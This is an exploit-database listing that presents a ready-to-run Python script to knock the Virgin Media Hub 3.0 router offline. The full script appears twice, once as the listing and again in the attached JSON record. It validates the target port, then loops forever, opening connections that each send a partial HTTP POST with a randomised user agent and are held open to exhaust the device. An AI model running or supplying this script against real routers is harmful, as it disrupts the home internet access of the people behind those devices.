Search...

Virgin Media Hub 3.0 Router - Denial of Service Exploit

2018-11-05T00:00:00

ID 1337DAY-ID-31531
Type zdt
Reporter Ross Inman
Modified 2018-11-05T00:00:00

Description

Exploit for hardware platform in category dos / poc

                                        
                                            # Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC)
# Exploit Author: Ross Inman
# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers
# Software Link: N/A
# Version: Virgin Media Hub 3.0
# Tested on: Linux
# CVE : N/A
 
#!/usr/bin/python2.7
 
import socket, sys, random, os
 
user_agents = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
 
def connection(ip,port):
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(1)
    test = s.connect_ex((ip,port))
    s.close()
    if(test == 0):
        return True
    else:
        return False
 
def dos(ip,port):
    socks = []
    payload = """
POST / HTTP/1.1\
Host: {}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: {}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
        """.format(ip,random.choice(user_agents))
    with open("/tmp/payload.txt","w") as f:
        f.write(payload)
        f.close()
    with open("/tmp/payload.txt","r") as f:
        lines = f.readlines()
        f.close()
    os.remove("/tmp/payload.txt")
    while(True):
        try:
            sys.stdout.write("\r[Info]Sending packets =&gt; {}".format(ip))
            s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            s.connect((ip,port))
            for line in lines:
                s.send(line)
            socks.append(s)
        except KeyboardInterrupt:
            print"\n[Info]Closing connections..."
            for sock in socks:
                sock.close()
                socks.remove(sock)
            sys.exit(0)
 
def main():
    if(len(sys.argv) != 3):
        sys.exit("Usage: ./dos.py {target ip} {port}")
    else:
        target = sys.argv[1]
        port = int(sys.argv[2])
    print"[Info]Checking connection to target..."
    check = connection(target,port)
    if(not check):
        sys.exit("[Failure]Connection to target failed.")
    print"[Info]Starting attack on: {}".format(target)
    dos(target,port)
 
if(__name__ == "__main__"):
    main()

#  0day.today [2018-11-06]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-31531", "bulletinFamily": "exploit", "title": "Virgin Media Hub 3.0 Router - Denial of Service Exploit", "description": "Exploit for hardware platform in category dos / poc", "published": "2018-11-05T00:00:00", "modified": "2018-11-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31531", "reporter": "Ross Inman", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-11-06T22:49:11", "edition": 1, "viewCount": 114, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-11-06T22:49:11", "rev": 2}, "dependencies": {"references": [], "modified": "2018-11-06T22:49:11", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/31531", "sourceData": "# Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC)\r\n# Exploit Author: Ross Inman\r\n# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers\r\n# Software Link: N/A\r\n# Version: Virgin Media Hub 3.0\r\n# Tested on: Linux\r\n# CVE : N/A\r\n \r\n#!/usr/bin/python2.7\r\n \r\nimport socket, sys, random, os\r\n \r\nuser_agents = [\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50\",\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393\"\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\r\n \"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\",\r\n \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n]\r\n \r\ndef connection(ip,port):\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n s.settimeout(1)\r\n test = s.connect_ex((ip,port))\r\n s.close()\r\n if(test == 0):\r\n return True\r\n else:\r\n return False\r\n \r\ndef dos(ip,port):\r\n socks = []\r\n payload = \"\"\"\r\nPOST / HTTP/1.1\\\r\nHost: {}\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: {}\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n \"\"\".format(ip,random.choice(user_agents))\r\n with open(\"/tmp/payload.txt\",\"w\") as f:\r\n f.write(payload)\r\n f.close()\r\n with open(\"/tmp/payload.txt\",\"r\") as f:\r\n lines = f.readlines()\r\n f.close()\r\n os.remove(\"/tmp/payload.txt\")\r\n while(True):\r\n try:\r\n sys.stdout.write(\"\\r[Info]Sending packets => {}\".format(ip))\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n s.connect((ip,port))\r\n for line in lines:\r\n s.send(line)\r\n socks.append(s)\r\n except KeyboardInterrupt:\r\n print\"\\n[Info]Closing connections...\"\r\n for sock in socks:\r\n sock.close()\r\n socks.remove(sock)\r\n sys.exit(0)\r\n \r\ndef main():\r\n if(len(sys.argv) != 3):\r\n sys.exit(\"Usage: ./dos.py {target ip} {port}\")\r\n else:\r\n target = sys.argv[1]\r\n port = int(sys.argv[2])\r\n print\"[Info]Checking connection to target...\"\r\n check = connection(target,port)\r\n if(not check):\r\n sys.exit(\"[Failure]Connection to target failed.\")\r\n print\"[Info]Starting attack on: {}\".format(target)\r\n dos(target,port)\r\n \r\nif(__name__ == \"__main__\"):\r\n main()\n\n# 0day.today [2018-11-06] #"}